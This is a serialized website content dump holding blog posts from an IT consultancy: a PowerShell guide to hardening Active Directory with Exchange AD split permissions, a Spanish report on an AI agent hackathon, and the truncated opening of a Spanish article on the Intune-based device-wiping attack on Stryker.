-PermissionType",[19964,20017,20018],{},[63,20019,19931],{},[63,20021,19996],{},[12,20023,20024],{},[63,20025,20026],{},[63,20027,20028],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType CreateUserAndContact -Trustee \"AD_Custom Exchange Split permissions replacement\"",[186,20030,20032],{"id":20031},"grant-exchange-rbac","Grant Exchange RBAC",[12,20034,20035,20038,20040],{},[251,20036,20037],{},"Re-enable -BypassSecurityGroupManagerCheck parameter for Add-DistributionGroupMember and Remove-DistributionGroupMember cmdlets:",[531,20039],{},[63,20041,20042],{},"New-RoleGroup -Name \"SplitPermission Security Group Creation and Membership\" -Roles \"Security Group Creation and Membership\" -Members \"Organization Management\",\"Recipient Management\" -Description \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\" ",[2109,20044,20045],{},[12,20046,20047,540,20051,20053],{},[251,20048,20049],{},[4328,20050,19872],{},[531,20052],{},"Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[12,20055,20056,20058,20061,20063],{},[531,20057],{},[251,20059,20060],{},"Re-enable New-Mailbox, New-RemoteMailbox, New-MailContact, Remove-... cmdlets with needed parameters:",[531,20062],{},[63,20064,20065],{},"New-RoleGroup -Name \"SplitPermission Mail Recipient Creation\" -Roles \"Mail Recipient Creation\" -Members \"Organization Management\",\"Recipient Management\" -Description \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[41,20067,20069],{"id":20068},"conclusions","Conclusions",[12,20071,20072],{},"I hope that with this guidance many more will take this important step to secure their Active Directory from compromise via Exchange. I have not yet run into issues when I implemented Exchange AD split permissions model and the adoption from this article at our customers.",[12,20074,20075],{},"I hope Microsoft will implement a native way to achieve this granular OU based approach, instead of the current all or nothing, for it to become widely adopted.",[12,20077,20078,20079,12756,20084,20089],{},"As AD Tiering is dear to my heart: Additionally, please do not logon to Exchange servers with Domain Admin (or any Tier0) accounts but treat them as Tier1 from now on and implement AD Tiering asap.\nAs a first step, I recommend tools like ",[2630,20080,20083],{"href":20081,"rel":20082},"https://www.pingcastle.com/",[3135],"PingCastle",[2630,20085,20088],{"href":20086,"rel":20087},"https://www.semperis.com/purple-knight/",[3135],"Purple Knight"," to assess your AD Security and Control Paths.",[2126,20091,20092],{},"\ncode {\n font-size: inherit\n}\n",{"title":65,"searchDepth":111,"depth":111,"links":20094},[20095,20096,20097,20098,20099,20102,20109],{"id":19580,"depth":329,"text":19581},{"id":19593,"depth":329,"text":19594},{"id":19622,"depth":329,"text":19623},{"id":19655,"depth":329,"text":19656},{"id":19714,"depth":111,"text":19715,"children":20100},[20101],{"id":19732,"depth":329,"text":19733},{"id":19752,"depth":111,"text":19753,"children":20103},[20104,20105,20106,20107,20108],{"id":19762,"depth":329,"text":19763},{"id":19805,"depth":329,"text":19806},{"id":19834,"depth":329,"text":19835},{"id":19954,"depth":329,"text":19955},{"id":20031,"depth":329,"text":20032},{"id":20068,"depth":111,"text":20069},{"lang":2257,"seoTitle":20111,"titleClass":2172,"date":20112,"blogtitlepic":20113,"socialimg":20114,"customExcerpt":20115,"keywords":20116,"hreflang":20117,"scripts":20122,"asideNav":20123,"maxContent":2180,"published":2167},"Exchange AD Split Permissions: Secure Active Directory with Least Privilege","2026-01-27","head-vulnerability-management","/heads/head-vulnerability-management.jpg","On-Premises Exchange Server installations are still prevalent even for organizations that have moved all mailboxes to the cloud. Also, they are still very powerful within Active Directory so most times there is a strong attack path on compromising the whole AD and with that usually much of the corporate IT. Switching to the so called “AD Split permissions” removes the critical permissions and I have engineered a solution that removes it’s downsides that usually prevented the adoption.","Exchange Server, Active Directory, AD split permissions, RBAC, Exchange permissions, AdminSDHolder, least privilege, AD ACL, PowerShell",[20118,20120],{"lang":2260,"href":20119},"/de/posts/2026-01-27-exchange-active-directory",{"lang":2257,"href":20121},"/en/posts/2026-01-27-exchange-active-directory",{"slick":2180,"form":2180},{"menuItems":20124},[20125,20127,20129,20131,20133],{"href":20126,"text":19581},"#tldr-what-if-we-remove-the-downsides",{"href":20128,"text":19623},"#why-do-we-care-now",{"href":20130,"text":19715},"#but-why-is-no-one-doing-it",{"href":20132,"text":19753},"#show-me-this-no-regrets-option",{"href":20134,"text":20069},"#conclusions","/posts/2026-01-27-exchange-active-directory",{"title":19573,"description":65},"posts/2026-01-27-exchange-active-directory","-FLRS_v-JeBKSrd-UJVsPjyfdPjI2CLJMJUjMXHB5wo",{"id":20140,"title":20141,"author":20142,"body":20143,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":20726,"moment":20727,"navigation":2180,"path":20746,"seo":20747,"stem":20748,"tags":2165,"webcast":2167,"__hash__":20749},"content_es/posts/2026-03-01-exchange-ad-split-permissions-hardening.md","Exchange AD Split Permissions without regrets",[2348],{"type":9,"value":20144,"toc":20713},[20145,20147,20150,20154,20158,20169,20171,20177,20181,20183,20190,20200,20204,20207,20211,20241,20258,20260,20267,20275,20279,20292,20294,20299,20301,20306,20364,20368,20405,20408,20411,20425,20432,20448,20456,20458,20461,20507,20510,20517,20522,20525,20537,20552,20564,20575,20579,20637,20639,20643,20663,20670,20693,20695,20698,20701,20711],[41,20146,19581],{"id":19580},[12,20148,20149],{},"I found a way to re-grant AD and RBAC permissions directly where Exchange users, groups, and contacts reside, requiring no changes for admins or identity management systems. In my experience, that friction has been the primary blocker for most companies. And we still retain the security benefits against lateral movement and domain compromise.",[12,20151,20152],{},[2772,20153],{"alt":19589,"src":19590},[12,20155,20156],{},[251,20157,19594],{},[6086,20159,20161,20165,20167],{"style":20160},"margin: 0.25rem 0",[1258,20162,19599,20163],{},[2630,20164,19604],{"href":19602},[1258,20166,19609],{},[1258,20168,19614],{},[12,20170,19619],{},[20172,20173],"video-frame",{"thumb":20174,"alt":20175,"id":20176,":full-width":7656},"/thumbs/thumb-exchange-ad-split-permissions-webcast.jpg","A presenter sits in front of a laptop explaining a slide titled Step 1: Active Directory Permissions by glueckkanja. The slide covers how to implement Microsoft Exchange AD Split Permissions, including PowerShell commands for creating a delegation group (New-ADGroup, Add-ADGroupMember) and applying permissions via the script Add-ExchangeADSplitPermissionOnOU.ps1.","soNZkNRopSQ",[52,20178,20180],{"style":20179},"background:var(--color-black-4); margin-top:0.5rem; padding:0.5rem 1rem; font-size:0.85rem; color:var(--color-blue-dark)","Webcast: Exchange AD Split Permissions without regrets. A Step-by-step implementation guide",[41,20182,19623],{"id":19622},[12,20184,20185,20186,20188,19629],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk of Active Directory takeover. Combined with Exchange being notorious for remote exploits the last few years, it’s time to act!",[531,20187],{},[531,20189],{},[1255,20191,20192,20194,20196,20198],{"style":20160},[1258,20193,19634],{},[1258,20195,19637],{},[1258,20197,19640],{},[1258,20199,19643],{},[12,20201,20202],{},[2772,20203],{"alt":19648,"src":19649},[12,20205,20206],{},"Only certain highly privileged Tier 0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[12,20208,20209],{},[251,20210,19656],{},[1255,20212,20213,20216,20232],{"style":20160},[1258,20214,20215],{},"Entra Connect Sync account when using Password Hash Sync",[1258,20217,20218,20219],{},"Default groups",[1255,20220,20222,20225,20230],{"style":20221},"margin: 0",[1258,20223,20224],{},"Allowed RODC Password Replication Group together with Entra Connect account (if a real Windows RODC exists)",[1258,20226,19672,20227,19678],{},[2630,20228,19677],{"href":20229,"target":2633},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta",[1258,20231,19681],{},[1258,20233,20234,20235],{},"Unprotected custom groups or admin/service accounts",[1255,20236,20237,20239],{"style":20221},[1258,20238,19689],{},[1258,20240,19692],{},[12,20242,20243,20244,20246,19698,20248,20251,20253,19706,20255],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU, you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[531,20245],{},[531,20247],{},[2630,20249,19703],{"href":19701,"rel":20250},[3135],[531,20252],{},[531,20254],{},[2630,20256,19711],{"href":19709,"rel":20257},[3135],[41,20259,19715],{"id":19714},[12,20261,20262,20263,20265,19721],{},"As split permissions weren’t available until Exchange 2010 SP1, everyone had accepted it by then and it seems that security teams did not manage to push it successfully once it existed.",[531,20264],{},[531,20266],{},[2109,20268,20269],{},[12,20270,20271,20274],{},[251,20272,20273],{},"Info:"," The following cmdlets will no longer be available or working: Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission",[12,20276,20277],{},[251,20278,19733],{},[1255,20280,20281,20290],{"style":20160},[1258,20282,20283,20284],{},"New-Mailbox (where Exchange writes to AD) would be:",[1255,20285,20286,20288],{"style":20221},[1258,20287,19743],{},[1258,20289,19746],{},[1258,20291,19749],{},[41,20293,19753],{"id":19752},[12,20295,20296,20298],{},[251,20297,19758],{},": Please fully read and understand the following links and articles, perform it in a test environment first, make sure AD backups are current and recovery practices are established!",[186,20300,19763],{"id":19762},[12,20302,20303],{},[251,20304,20305],{},"You should first check which of the affected cmdlets are in use on which OUs:",[524,20307,20308,20315,20317,20323,20325],{},[102,20309,20310,20314],{},[102,20311,20313],{"style":20312},"color:var(--color-orange)","$CsvPath"," = \"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[531,20316],{},[102,20318,20319,20322],{},[102,20320,20321],{"style":20312},"$Cmdlets"," = \"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[531,20324],{},[102,20326,20327,540,20330,20334,20335,540,20338,20340,20341,20344,20345,540,20348,540,20351,540,20353,20356,20357,20360,20361],{},[102,20328,20329],{"style":20312},"Search-AdminAuditLog",[102,20331,20333],{"style":20332},"color:var(--color-blue-medium)","-ResultSize"," 99000 ",[102,20336,20337],{"style":20332},"-Cmdlets",[102,20339,20321],{"style":20312}," | ",[102,20342,20343],{"style":20312},"Select-Object"," RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($\\_.CmdletParameters))}},succeeded,error | ",[102,20346,20347],{"style":20312},"Export-Csv",[102,20349,20350],{"style":20332},"-Path",[102,20352,20313],{"style":20312},[102,20354,20355],{"style":20332},"-Delimiter"," \";\" ",[102,20358,20359],{"style":20332},"-Encoding"," Unicode ",[102,20362,20363],{"style":20332},"-NoTypeInformation",[12,20365,20366],{},[251,20367,19788],{},[524,20369,20370,20386,20388,20396,20398],{},[102,20371,20372,20375,20376,540,20379,540,20381,540,20383,20385],{},[102,20373,20374],{"style":20312},"$CSVs"," = ",[102,20377,20378],{"style":20312},"Import-Csv",[102,20380,20350],{"style":20332},[102,20382,20313],{"style":20312},[102,20384,20355],{"style":20332}," \";\"",[531,20387],{},[102,20389,20390,20340,20392,20395],{},[102,20391,20374],{"style":20312},[102,20393,20394],{"style":20312},"Group-Object"," Caller",[531,20397],{},[102,20399,20400,20340,20402,20404],{},[102,20401,20374],{"style":20312},[102,20403,20394],{"style":20312}," CmdletName",[12,20406,20407],{},"Analyze the CSV for where AD permissions will be needed. Potentially optimize by moving all Exchange-relevant groups into dedicated OUs.",[41,20409,20410],{"id":19805},"Enable Split Permissions Model",[12,20412,20413,20414,20417,20418,20422],{},"Follow Microsoft's instructions ",[251,20415,20416],{},"\"Switch to Active Directory split permissions\""," in\n",[2630,20419,19703],{"href":20420,"rel":20421},"https://learn.microsoft.com/en-us/exchange/configure-exchange-server-for-split-permissions",[3135],[4328,20423,20424],{},"(NOT RBAC split permissions)",[12,20426,20427,20428,20431],{},"In essence, it will remove the dangerous permissions of the ",[251,20429,20430],{},"\"Exchange Windows Permissions\""," group and also remove Exchange as a group member.",[524,20433,20434],{},[102,20435,20436,540,20439,540,20442,540,20445],{},[102,20437,20438],{"style":20312},"Setup.exe",[102,20440,20441],{"style":20332},"/IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF",[102,20443,20444],{"style":20332},"/PrepareAD",[102,20446,20447],{"style":20332},"/ActiveDirectorySplitPermissions:true",[52,20449,420,20451,20453,20454],{"style":20450},"background:#f4f4f4; border-left:4px solid var(--color-green-blue); border-radius:0 6px 6px 0; padding:0.75rem 1rem; margin:1rem 0; font-size:0.88rem; color:#000520;",[251,20452,20273],{}," To revert back, simply use ",[63,20455,19831],{},[186,20457,19835],{"id":19834},[12,20459,20460],{},"Create a custom AD group and make Exchange servers members.",[524,20462,20463,20469,20471,540,20474,20477,20478,20481,20482,20485,20486,540,20488,540,20491,20494,20495,20497,20477,20500,20503,20504],{},[102,20464,20465],{},[102,20466,20468],{"style":20467},"color:var(--color-black-40)","# adjust OU Path first!",[531,20470],{},[102,20472,20473],{"style":20312},"New-ADGroup",[102,20475,20476],{"style":20332},"-Name"," \"AD_Custom Exchange Split permissions replacement\" ",[102,20479,20480],{"style":20332},"-GroupCategory"," Security ",[102,20483,20484],{"style":20332},"-GroupScope"," DomainLocal ",[102,20487,20350],{"style":20332},[251,20489,20490],{},"\"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\"",[102,20492,20493],{"style":20332},"-Description"," \"replaces the permissions lost by split permissions on relevant OUs\"",[531,20496],{},[102,20498,20499],{"style":20312},"Add-ADGroupMember",[102,20501,20502],{"style":20332},"-Members"," \"Exchange Trusted Subsystem\"\n",[102,20505,20506],{"style":20467},"# reboot Exchange servers for permissions via group to work",[12,20508,20509],{},"I’ve created a script to make delegating the AD permissions easy per use case.",[2109,20511,20512],{},[12,20513,20514,20515,19877],{},"Without these permissions the Exchange server would receive the error ",[63,20516,19876],{},[12,20518,19882,20519,19888],{},[2630,20520,19887],{"href":19885,"rel":20521},[3135],[12,20523,20524],{},"It can grant the following PermissionTypes:",[12,20526,20528,20530,19903,20532,20534],{"style":20527},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8;",[251,20529,19898],{},[531,20531],{},[531,20533],{},[3703,20535,20536],{},"Exchange cmdlets: `New-Mailbox`, `New-RemoteMailbox`, `New-MailUser`, `New-MailContact` and matching `Remove-*`",[12,20538,20540,20542,19916,20544,20546],{"style":20539},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8",[251,20541,19911],{},[531,20543],{},[531,20545],{},[3703,20547,20548,20549,20551],{},"Exchange cmdlets: `New-DistributionGroup`, `Remove-DistributionGroup`, `Add-DistributionGroupMember`, `Update-DistributionGroupMember`, `Remove-DistributionGroupMember`",[531,20550],{},"Also: user managing DistributionGroups they own via EAC",[12,20553,20554,20556,20558,20559,20561],{"style":20539},[251,20555,19931],{},[531,20557],{},"Modify AD Permissions on Users",[531,20560],{},[3703,20562,20563],{},"Exchange cmdlet: `Add-ADPermission`",[12,20565,20566,20568,20570,20571,20573],{"style":20539},[251,20567,19944],{},[531,20569],{},"Modify AD Permissions on Groups",[531,20572],{},[3703,20574,20563],{},[12,20576,20577],{},[251,20578,19955],{},[524,20580,20581,540,20583,20586,20587,20589,20590,20593,20594,20597,20599,540,20601,20603,20604,20606,20607,20593,20609,540,20611,20603,20613,20615,20616,20593,20618,540,20620,20622,20623,20625,20626,20593,20628,540,20630,20622,20632,20634,20635,20593],{},[102,20582,19887],{"style":20312},[102,20584,20585],{"style":20332},"-TargetOU"," \u003COU> ",[102,20588,19971],{"style":20332}," \u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact> ",[102,20591,20592],{"style":20332},"-Trustee"," \"AD_Custom Exchange Split permissions replacement\"\n",[102,20595,20596],{"style":20467},"# For example",[531,20598],{},[102,20600,19887],{"style":20312},[102,20602,20585],{"style":20332}," \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[102,20605,19971],{"style":20332}," GroupManage ",[102,20608,20592],{"style":20332},[102,20610,19887],{"style":20312},[102,20612,20585],{"style":20332},[102,20614,19971],{"style":20332}," GroupSendAs ",[102,20617,20592],{"style":20332},[102,20619,19887],{"style":20312},[102,20621,20585],{"style":20332}," \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[102,20624,19971],{"style":20332}," UserSendAs ",[102,20627,20592],{"style":20332},[102,20629,19887],{"style":20312},[102,20631,20585],{"style":20332},[102,20633,19971],{"style":20332}," CreateUserAndContact ",[102,20636,20592],{"style":20332},[186,20638,20032],{"id":20031},[12,20640,20641],{},[251,20642,20037],{},[524,20644,20645],{},[102,20646,20647,540,20650,20652,20653,20656,20657,20659,20660,20662],{},[102,20648,20649],{"style":20312},"New-RoleGroup",[102,20651,20476],{"style":20332}," \"SplitPermission Security Group Creation and Membership\" ",[102,20654,20655],{"style":20332},"-Roles"," \"Security Group Creation and Membership\" ",[102,20658,20502],{"style":20332}," \"Organization Management\",\"Recipient Management\" ",[102,20661,20493],{"style":20332}," \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\"",[2109,20664,20665],{},[12,20666,20667,20669],{},[251,20668,20273],{}," Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[12,20671,20672,20674,20676,20678],{},[531,20673],{},[251,20675,20060],{},[531,20677],{},[524,20679,20680,540,20682,20684,20685,20687,20688,20659,20690,20692],{},[102,20681,20649],{"style":20312},[102,20683,20476],{"style":20332}," \"SplitPermission Mail Recipient Creation\" ",[102,20686,20655],{"style":20332}," \"Mail Recipient Creation\" ",[102,20689,20502],{"style":20332},[102,20691,20493],{"style":20332}," \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[41,20694,20069],{"id":20068},[12,20696,20697],{},"I hope this guide helps more organizations take the important step of securing their Active Directory against compromise via Exchange. In my experience implementing the Exchange AD Split Permissions model across multiple customers, I have not encountered any issues and the adoption has been smooth.",[12,20699,20700],{},"I also hope Microsoft will introduce a native, OU-based approach to achieve this level of granularity, rather than the current all-or-nothing model, which would make widespread adoption significantly easier.",[12,20702,20703,20704,12756,20707,20710],{},"A note on AD Tiering: Please do not log on to Exchange servers with Domain Admin or any other Tier 0 accounts. Treat Exchange servers as Tier 1 and implement AD Tiering as soon as possible. As a first step, I recommend using ",[2630,20705,20083],{"href":20081,"rel":20706},[3135],[2630,20708,20088],{"href":20086,"rel":20709},[3135]," to assess your AD security posture and identify control path exposures.",[2126,20712,20092],{},{"title":65,"searchDepth":111,"depth":111,"links":20714},[20715,20716,20717,20718,20721,20725],{"id":19580,"depth":111,"text":19581},{"id":19622,"depth":111,"text":19623},{"id":19714,"depth":111,"text":19715},{"id":19752,"depth":111,"text":19753,"children":20719},[20720],{"id":19762,"depth":329,"text":19763},{"id":19805,"depth":111,"text":20410,"children":20722},[20723,20724],{"id":19834,"depth":329,"text":19835},{"id":20031,"depth":329,"text":20032},{"id":20068,"depth":111,"text":20069},{"lang":2170,"seoTitle":20111,"titleClass":2172,"date":20727,"blogtitlepic":20728,"socialimg":20729,"customExcerpt":20730,"keywords":20116,"hreflang":20731,"scripts":20738,"asideNav":20739,"maxContent":2180,"published":2180},"2026-03-01","head-exchange-ad-split-permissions","/blog/heads/head-exchange-ad-split-permissions.jpg","Even organizations that have fully migrated their mailboxes to the cloud often still run on-premises Exchange servers and with them, an underestimated security risk for Active Directory. The \"AD Split Permissions\" model strips Exchange of the broad AD privileges attackers could exploit for a full domain compromise. Until now, adoption has largely failed due to the process changes it imposes on administrators. This article shows how to elegantly overcome exactly that hurdle: a script that selectively re-grants the lost AD permissions on the relevant OUs only, preserving the familiar admin workflow while still achieving the full security benefit.",[20732,20734,20736],{"lang":2260,"href":20733},"/de/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":2170,"href":20735},"/es/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":2257,"href":20737},"/en/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"slick":2180,"form":2180},{"menuItems":20740},[20741,20742,20743,20744,20745],{"href":20126,"text":19581},{"href":20128,"text":19623},{"href":20130,"text":19715},{"href":20132,"text":19753},{"href":20134,"text":20069},"/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"title":20141,"description":65},"posts/2026-03-01-exchange-ad-split-permissions-hardening","9ZFNX8Pv31TgupGrsjC8PiJPkDiF4A1c8-NeV2LDJ-8",{"id":20751,"title":20752,"author":20753,"body":20754,"cta":2165,"description":20758,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":20790,"moment":20792,"navigation":2180,"path":20805,"seo":20806,"stem":20807,"tags":20808,"webcast":2167,"__hash__":20812},"content_es/posts/2026-03-16-ai-agent-hackathon.md","Seis agentes. Cuatro semanas. Producción real.",[2460],{"type":9,"value":20755,"toc":20788},[20756,20759,20762,20765,20768,20771,20776,20779,20782,20785],[12,20757,20758],{},"¿Cuántas horas dedica tu departamento de TI cada semana a tareas que un agente podría resolver en minutos?",[12,20760,20761],{},"Existe un tipo de proceso que casi todos los departamentos de TI conocen: alguien lee contratos. Alguien más clasifica requisitos en categorías. Otra persona responde las mismas preguntas sobre entregas que ya respondió ayer. No son problemas glamorosos. Pero son los que en conjunto cuestan decenas de miles de horas al año — y son sorprendentemente adecuados para los agentes de IA, si sabes dónde aplicar la palanca.",[12,20763,20764],{},"Seis empresas hicieron exactamente eso en febrero en nuestras oficinas de Offenbach. Kiekert ahora categoriza los requisitos de I+D mediante lógica basada en reglas, con una puntuación de confianza y un bucle de retroalimentación. El agente ya está en producción. Dr. Oetker construyó un Contract Review Assistant que revisa contratos de TI en busca de cláusulas críticas y genera un informe estructurado para compras y legal. Eckes-Granini presentó dos agentes: un agente de incorporación que guía a los nuevos empleados desde su primer inicio de sesión a través de MFA, configuración de Office y políticas de seguridad, y un agente de logística que responde preguntas de los operadores sobre envíos, tarifas y transportistas. igefa desarrolló un agente de asistencia telefónica por voz para el soporte de TI interno, conectado a JIRA y Confluence. Y lila logistik trajo quizás el proyecto más inusual: un generador de casos de uso que observa SharePoint y Exchange para identificar potencial de automatización — porque el problema real a menudo no es la tecnología, sino que nadie en la empresa identifica los lugares adecuados para automatizar.",[12,20766,20767],{},"Todo esto se desarrolló en Copilot Studio, con Agent Flows, conexiones a Dataverse y conectores MCP, con el acompañamiento de cuatro de nuestros MVPs. Cuatro semanas de desarrollo junto al trabajo habitual del día a día. Los participantes tuvieron que encontrar cada hora para ello entre tickets, cierres trimestrales y operaciones. Que al final existieran seis agentes funcionales dice menos sobre la tecnología que sobre los equipos que los construyeron.",[12,20769,20770],{},"El 10 de marzo en el Microsoft Office de Fráncfort llegó la prueba final: seis presentaciones de 20 minutos cada una, evaluadas por impacto en el negocio, profundidad técnica y los aplausos del público (sí, eso también está en la hoja de evaluación). Kiekert ganó porque su agente está en producción, construido por alguien del área de negocio, sin experiencia en TI ni en Copilot Studio. Dr. Oetker, porque la revisión de contratos es tan universal que el jurado empezó a pensar en sus propios contratos de TI después. Que los seis equipos hayan construido un agente funcional en cuatro semanas junto a su trabajo habitual fue, en definitiva, la verdadera noticia del día.",[20172,20772],{"thumb":20773,"alt":20774,"id":20775,":full-width":7656},"/thumbs/thumb-ai-agent-hackathon.jpg","Presentación del glueckkanja AI Agent Hackathon en la oficina de Microsoft en Fráncfort: seis equipos muestran sus agentes de Copilot Studio ante el público.","GjumQAnKj8k",[52,20777,20778],{"style":20179},"glueckkanja AI Agent Hackathon – Seis empresas, seis agentes, cuatro semanas",[12,20780,20781],{},"El formato se llama glueckkanja AI Agent Hackathon. Surgió de un hackathon de Microsoft en Múnich en el que participamos con Knorr-Bremse. Microsoft nos pidió después continuar el formato con nuestros clientes. La idea es sencilla: las empresas se inscriben con un proceso concreto que hoy se realiza de forma manual. Nosotros refinamos el caso de uso, definimos la arquitectura y construimos juntos. Para quienes no estén listos para participar directamente en el hackathon: también ofrecemos talleres para identificar casos de uso y preparar la arquitectura del agente — ya sea como punto de entrada o como formato independiente.",[12,20783,20784],{},"El próximo glueckkanja AI Agent Hackathon comienza en otoño de 2026. El registro está abierto. Si quieres identificar casos de uso y preparar tu entorno antes de eso: estamos encantados de ayudarte. Contáctanos.",[12,20786,20787],{},"Gracias a Sylvia y Miriam de Microsoft por su confianza en el formato. A Kiekert, Dr. Oetker, Eckes-Granini, igefa y lila logistik por su valentía y dedicación. Y a nuestro equipo de glueckkanja por hacer esto posible.",{"title":65,"searchDepth":111,"depth":111,"links":20789},[],{"lang":2170,"seoTitle":20791,"titleClass":2172,"date":20792,"categories":20793,"blogtitlepic":20794,"socialimg":20795,"customExcerpt":20796,"keywords":20797,"hreflang":20798,"published":2180},"glueckkanja AI Agent Hackathon: Seis empresas construyen agentes de IA con Copilot Studio","2026-03-16",[2663],"head-ai-agent-hackathon.jpg","/blog/heads/head-ai-agent-hackathon.jpg","Seis empresas, cuatro semanas de desarrollo, seis agentes de IA funcionando — eso fue el primer glueckkanja AI Agent Hackathon. Kiekert, Dr. Oetker, Eckes-Granini, igefa y lila logistik crearon agentes en Copilot Studio que hoy están en producción. Aquí está lo que se construyó y cómo funciona el formato.","AI Agent Hackathon, Copilot Studio, glueckkanja, agentes de IA, Microsoft Copilot, Agent Flows, Dataverse, MCP Connector, Kiekert, Dr. Oetker, Eckes-Granini, igefa, lila logistik, automatización con IA, IA empresarial, automatización de procesos",[20799,20801,20803],{"lang":2260,"href":20800},"/de/posts/2026-03-16-ai-agent-hackathon",{"lang":2257,"href":20802},"/en/posts/2026-03-16-ai-agent-hackathon",{"lang":2170,"href":20804},"/es/posts/2026-03-16-ai-agent-hackathon","/posts/2026-03-16-ai-agent-hackathon",{"title":20752,"description":20758},"posts/2026-03-16-ai-agent-hackathon",[20809,20810,20811,18315],"AI","Copilot Studio","Hackathon","mUMQrBAYy0hMGUSdyjrBW8cXB3Y4_indr1vEHu3yHuI",{"id":20814,"title":20815,"author":20816,"body":20817,"cta":2165,"description":20821,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":21064,"moment":21066,"navigation":2180,"path":21122,"seo":21123,"stem":21124,"tags":21125,"webcast":2167,"__hash__":21127},"content_es/posts/2026-03-20-stryker-attack-intune-privilege.md","Sin Malware. Solo una Cuenta de Administrador.",[2208],{"type":9,"value":20818,"toc":21052},[20819,20822,20825,20829,20831,20834,20837,20840,20844,20846,20849,20852,20855,20858,20862,20864,20867,20870,20874,20876,20879,20882,20885,20889,20891,20894,20900,20904,20906,20913,20916,20919,20922,20929,20932,20937,20946,20950,20952,20959,20962,20971,20974,20977,20980,20983,20986,20989,20993,20995,20998,21001,21004,21012,21015,21018,21021,21023],[12,20820,20821],{},"Miércoles, 11 de marzo de 2026. Los empleados de las oficinas de Stryker en 79 países encendieron sus ordenadores y los encontraron en blanco. Pantallas de inicio de sesión reemplazadas por un logotipo. Portátiles corporativos, teléfonos de empresa, dispositivos personales inscritos en el programa BYOD de la compañía. Todos borrados simultáneamente, de madrugada. Sin ransomware. Sin firmas de malware. Nada que una herramienta de detección de endpoints pudiera capturar.",[12,20823,20824],{},"El atacante, un grupo hacktivista pro-iraní llamado Handala, había convertido la propia infraestructura de gestión de TI de Stryker en el arma.",[41,20826,20828],{"id":20827},"lo-que-realmente-ocurrió","Lo que realmente ocurrió",[12,20830,31],{},[12,20832,20833],{},"El núcleo del ataque no fue un exploit sofisticado ni una vulnerabilidad de día cero. Fue algo mucho más simple y, francamente, mucho más común: una cuenta de administrador fue comprometida, y esa cuenta tenía acceso a Microsoft Intune.",[12,20835,20836],{},"Según los informes de BleepingComputer, aproximadamente 80.000 dispositivos fueron borrados entre las 5:00 y las 8:00 UTC. Handala afirmó que el número superó los 200.000, incluyendo servidores y dispositivos móviles en las operaciones globales de la empresa en 79 países.",[12,20838,20839],{},"Sin malware personalizado. Sin binarios maliciosos que detectar. Un ataque de tipo living-off-the-land, ejecutado íntegramente a través de una consola de gestión legítima.",[41,20841,20843],{"id":20842},"por-qué-tuvo-éxito-este-ataque","Por qué tuvo éxito este ataque",[12,20845,31],{},[12,20847,20848],{},"Hay un problema estructural en la raíz de esto, y no es exclusivo de Stryker. Es endémico en las empresas.",[12,20850,20851],{},"La mayoría de las organizaciones tratan las tareas administrativas y el trabajo diario como actividades que pueden coexistir cómodamente en el mismo dispositivo, bajo la misma identidad de usuario. Un administrador de TI responde correos electrónicos, navega por la web, hace clic en algún enlace ocasional y — desde esa misma sesión, en esa misma máquina — gestiona infraestructura en la nube, aprueba cambios de acceso o, en este caso, accede a una consola de gestión de dispositivos con el poder de borrar toda la flota.",[12,20853,20854],{},"Esta es la superficie de ataque. Cuando el contexto de trabajo cotidiano y el contexto de administración privilegiada comparten un endpoint común y una identidad común, cualquier compromiso de ese endpoint es automáticamente 